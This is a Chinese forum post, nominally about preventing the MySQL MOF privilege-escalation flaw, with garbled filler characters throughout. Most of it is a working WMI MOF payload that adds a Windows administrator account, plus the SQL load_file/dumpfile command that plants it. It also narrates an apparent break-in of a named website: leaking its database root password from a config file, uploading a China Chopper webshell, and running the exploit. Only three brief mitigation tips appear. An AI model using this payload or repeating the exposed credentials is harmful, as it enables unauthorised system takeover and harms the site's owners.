Mysql mof扩展漏洞防范方法8 {( B: B" j, j6 I" J' L9 R
. Q9 M+ q6 p4 S$ L网上公开的一些利用代码:
5 U; H- h/ g. M/ E
( f3 @+ j5 R9 d7 P6 K% i#pragma namespace(“\\\\.\\root\\subscription”)
7 t: r2 @9 |7 T' _/ I& \- j7 N ~6 g( }( s+ S
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
: O, e+ {3 }) h
1 j9 E+ F2 b* m- M/ ~- ^7 ] # M M0 @1 ]* l4 L
; @& R) E1 u) g U 3 Z! K8 j, X2 f/ m0 q: L
, V$ ^6 i. w3 k) X6 P5 W. ?
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;* s1 L* r- y t/ z
从上面代码来看得出解决办法:
9 T: {* } i! c5 j. o; c. j2 x' _ t" J7 ^) ]. C& g
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数, D/ _' ?" D- v- n
5 U2 l8 s' Q% g5 h
2、禁止使用”WScript.Shel”组件
, Y: k: }3 h. V" q
) S- j; P, W* f2 d) X1 g3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
& W# r, K1 g- y+ z9 V% P! D2 Z
9 ^% w; q, [" k4 Z4 ^' Q4 w# j/ f7 B当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下$ q8 ^7 B$ f* X( s+ Z5 I5 T
/ b+ z! b& F+ |/ T" A
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权& A# ~7 ^- h, y; U" N8 T
M1 `* K: g5 L: E8 o( |
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
+ Z+ W6 ]; x3 q
9 e) g1 T$ H& T0 J' X4 \看懂了后就开始练手吧7 }9 H& w/ F2 c, i. Z5 m
2 k1 A1 J. F5 E4 U" Thttp://www.webbmw.com/config/config_ucenter.php 一句话 a
0 V/ ~/ b% f* N7 J7 s$ I
# b+ z& ~( r5 V: a6 M$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。' t0 ~4 O* [8 P8 d4 j F
# g# u5 u! x; }- r' Z, @
于是直接用菜刀开搞
) b1 m( J1 b3 Y q+ {& o, |
3 B) `4 g6 \5 S _: s上马先
1 v; S" Y* z* V9 ~. Y3 P6 T& ^5 D- ^7 N+ Q. r
既然有了那些账号 之类的 于是我们就执行吧…….
" G7 e' ~4 d1 k {8 u
, I8 _! V" }! }" c4 a& ?9 z小小的说下% i5 v% x! q4 h; q3 \
, V7 G9 r; ]4 \% }8 U: f' E5 L
在这里第1次执行未成功 原因未知
- `9 f% D* S- k# d0 E* N4 v2 U9 M: D4 D# A$ j% ~
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
4 h" ]$ ]8 a4 W# ~; d( L4 z+ l5 R# ]+ G4 b2 f5 j' J, x
#pragma namespace(“\\\\.\\root\\subscription”)
& ~& e5 v5 {+ l' I$ n. L6 ^9 I2 j4 K/ B1 E; ^) l+ `0 ]
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
- {2 J9 b, a0 g/ c1 a; J0 W6 \, Q; [) I% Z
我是将文件放到C:\WINDOWS\temp\1.mof
/ u, T5 ]" x# X# ?" b+ u$ c) ?+ ?" P1 w/ z+ I$ ~! f5 \/ D9 z
所以我们就改下执行的代码
8 d; [0 s% P) m. D9 j4 R% c1 S2 {! I
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;* R T. S: c1 ]
; t+ a' Q/ E# q+ l; a/ ? F
! T) L+ j, L, v3 N3 p0 D$ f
5 \# E6 {$ P' X& J8 k" h但是 你会发现账号还是没有躺在那里。。& J2 D0 m* C9 h/ d; J6 B
( b d; t% G! ?7 e1 [7 k8 y2 ~/ k
于是我就感觉蛋疼
3 D6 D" g6 y, i2 J6 W8 v, d8 I
$ L+ G( U8 v2 D就去一个一个去执行 但是执行到第2个 mysql时就成功了………$ `/ B! F Z# W2 D' j
8 `) d% _; ^! z
" Y( T; o* f) `
! k) T5 D& l9 `* C6 I但是其他库均不成功…
6 c0 n/ j, r6 P8 E9 j& w
6 U( }; A5 A, Z! y1 w/ s3 n我就很费解呀 到底为什么不成功求大牛解答…
3 _9 b4 v* w4 z- k" @" b1 j- y8 W9 b7 x5 F
8 w8 c3 x) s: w3 }3 I" W4 _
$ S* V7 _( A1 k( t
|
发表于 2013-1-4 19:49:49
收藏
支持
反对